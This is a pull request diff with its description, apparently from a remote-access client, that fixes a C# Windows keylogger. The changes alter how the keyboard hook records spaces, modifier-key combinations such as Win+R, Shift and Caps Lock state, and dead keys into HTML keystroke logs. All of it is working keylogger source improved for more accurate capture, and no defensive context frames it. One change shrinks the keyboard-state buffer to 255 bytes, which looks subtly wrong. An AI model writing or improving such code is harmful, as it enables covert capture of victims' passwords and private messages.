### PR TITLE
Keylogger fixes

### DIFF
--- a/Client/Core/Keylogger/Implementation/KeyboardState.cs
+++ b/Client/Core/Keylogger/Implementation/KeyboardState.cs
@@ -33,7 +33,7 @@ namespace xClient.Core.Keylogger.Implementation
         /// <returns>An instance of <see cref="KeyboardState" /> class representing a snapshot of keyboard state at certain moment.</returns>
         public static KeyboardState GetCurrent()
         {
-            byte[] keyboardStateNative = new byte[256];
+            byte[] keyboardStateNative = new byte[255];
             KeyboardNativeMethods.GetKeyboardState(keyboardStateNative);
             return new KeyboardState(keyboardStateNative);
         }

--- a/Client/Core/Keylogger/KeyPressEventArgsExt.cs
+++ b/Client/Core/Keylogger/KeyPressEventArgsExt.cs
@@ -108,9 +108,8 @@ namespace xClient.Core.Keylogger
             else
             {
                 char[] chars;
-                var isOk =
-                    KeyboardNativeMethods.TryGetCharFromKeyboardState(virtualKeyCode, scanCode, fuState, out chars);
-                if (!isOk) yield break;
+                KeyboardNativeMethods.TryGetCharFromKeyboardState(virtualKeyCode, scanCode, fuState, out chars);
+                if (chars == null) yield break;
                 foreach (var current in chars)
                 {
                     yield return new KeyPressEventArgsExt(current, keyboardHookStruct.Time);

--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -112,12 +112,13 @@ namespace xClient.Core.Keylogger
             // The keys below are excluded. If it is one of the keys below,
             // the KeyPress event will handle these characters. If the keys
             // are not any of those specified below, we can continue.
-            if (!((e.KeyCode >= Keys.A && e.KeyCode <= Keys.Z)
-            || (e.KeyCode >= Keys.NumPad0 && e.KeyCode <= Keys.Divide)
-            || (e.KeyCode >= Keys.D0 && e.KeyCode <= Keys.D9)
-            || (e.KeyCode >= Keys.Oem1 && e.KeyCode <= Keys.OemClear
-            || (e.KeyCode >= Keys.LShiftKey && e.KeyCode <= Keys.RShiftKey)
-            || (e.KeyCode == Keys.CapsLock))))
+            if (!(e.KeyCode >= Keys.A && e.KeyCode <= Keys.Z
+            || e.KeyCode >= Keys.NumPad0 && e.KeyCode <= Keys.Divide
+            || e.KeyCode >= Keys.D0 && e.KeyCode <= Keys.D9
+            || e.KeyCode >= Keys.Oem1 && e.KeyCode <= Keys.OemClear
+            || e.KeyCode >= Keys.LShiftKey && e.KeyCode <= Keys.RShiftKey
+            || e.KeyCode == Keys.CapsLock
+            || e.KeyCode == Keys.Space))
             {
                 // The key was not part of the keys that we wish to filter, so
                 // be sure to prevent a situation where multiple keys are pressed.
@@ -131,6 +132,9 @@ namespace xClient.Core.Keylogger
         //This method should be used to process all of our unicode characters
         private void Logger_KeyPress(object sender, KeyPressEventArgs e) //Called second
         {
+            if (ModifierKeysSet())
+                return;
+
             if (!_pressedKeyChars.Contains(e.KeyChar))
             {
                 _pressedKeyChars.Add(e.KeyChar);
@@ -195,9 +199,6 @@ namespace xClient.Core.Keylogger
 
                 switch (names[i])
                 {
-                    case "Space":
-                        normalKeys.Append("&nbsp;");
-                        break;
                     case "Return":
                         normalKeys.Append(@"<p class=""h"">[Enter]</p><br>");
                         break;

--- a/Client/Core/Keylogger/LoggerHelper.cs
+++ b/Client/Core/Keylogger/LoggerHelper.cs
@@ -22,8 +22,8 @@ namespace xClient.Core.Keylogger
                     return "&quot;";
                 case '\'':
                     return "&apos;";
-                case ' ': // space is already proccessed by OnKeyDown
-                    return string.Empty;
+                case ' ':
+                    return "&nbsp;";
             }
             return key.ToString();
         }

--- a/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
+++ b/Client/Core/Keylogger/WinApi/KeyboardNativeMethods.cs
@@ -31,6 +31,10 @@ namespace xClient.Core.Keylogger.WinApi
         public const byte VK_MENU = 0x12;
         public const byte VK_PACKET = 0xE7;
         //Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods
+        private static int lastVirtualKeyCode = 0;
+        private static int lastScanCode = 0;
+        private static byte[] lastKeyState = new byte[255];
+        private static bool lastIsDead = false;
 
         /// <summary>
         ///     Translates a virtual key to its character equivalent using the current keyboard layout without knowing the
@@ -75,23 +79,30 @@ namespace xClient.Core.Keylogger.WinApi
             StringBuilder pwszBuff = new StringBuilder(64);
             KeyboardState keyboardState = KeyboardState.GetCurrent();
             byte[] currentKeyboardState = keyboardState.GetNativeState();
+            bool isDead = false;
+
+            if (keyboardState.IsDown(Keys.ShiftKey))
+                currentKeyboardState[(byte) Keys.ShiftKey] = 0x80;
+
+            if (keyboardState.IsToggled(Keys.CapsLock))
+                currentKeyboardState[(byte) Keys.CapsLock] = 0x01;
 
             var relevantChars = ToUnicodeEx(virtualKeyCode, scanCode, currentKeyboardState, pwszBuff, pwszBuff.Capacity, fuState, dwhkl);
-
 
             switch (relevantChars)
             {
                 case -1:
+                    isDead = true;
                     ClearKeyboardBuffer(virtualKeyCode, scanCode, dwhkl);
                     chars = null;
-                    return false;
+                    break;
 
                 case 0:
                     chars = null;
-                    return false;
+                    break;
 
                 case 1:
-                    chars = new[] {pwszBuff[0]};
+                    chars = new[] { pwszBuff[0] };
                     break;
 
                 // Two or more (only two of them is relevant)
@@ -100,20 +111,19 @@ namespace xClient.Core.Keylogger.WinApi
                     break;
             }
 
-
-
-            var isDownShift = keyboardState.IsDown(Keys.ShiftKey);
-            var isToggledCapsLock = keyboardState.IsToggled(Keys.CapsLock);
-
-            for (int i = 0; i < chars.Length; i++)
+            if (lastVirtualKeyCode != 0 && lastIsDead)
             {
-                var ch = chars[i];
-                if ((isToggledCapsLock ^ isDownShift) && Char.IsLetter(ch))
-                {
-                    chars[i] = Char.ToUpper(ch);
-                }
+                StringBuilder sbTemp = new StringBuilder(5);
+                ToUnicodeEx(lastVirtualKeyCode, lastScanCode, lastKeyState, sbTemp, sbTemp.Capacity, 0, dwhkl);
+                lastVirtualKeyCode = 0;
+
+                return true;
             }
 
+            lastScanCode = scanCode;
+            lastVirtualKeyCode = virtualKeyCode;
+            lastIsDead = isDead;
+            lastKeyState = (byte[]) currentKeyboardState.Clone();
 
             return true;
         }


### PR DESCRIPTION
-Fixed spaces showing up in weird orders.

-Fixed issue where pressing some modifier keys would append the KeyPress
events text prior to the Appended highlighted text from the KeyDown
event.  Example:  User presses Windows Key + R.  it would log "r[Win +
[R]"

-POSSIBLY fixed dead keys, needs to be tested!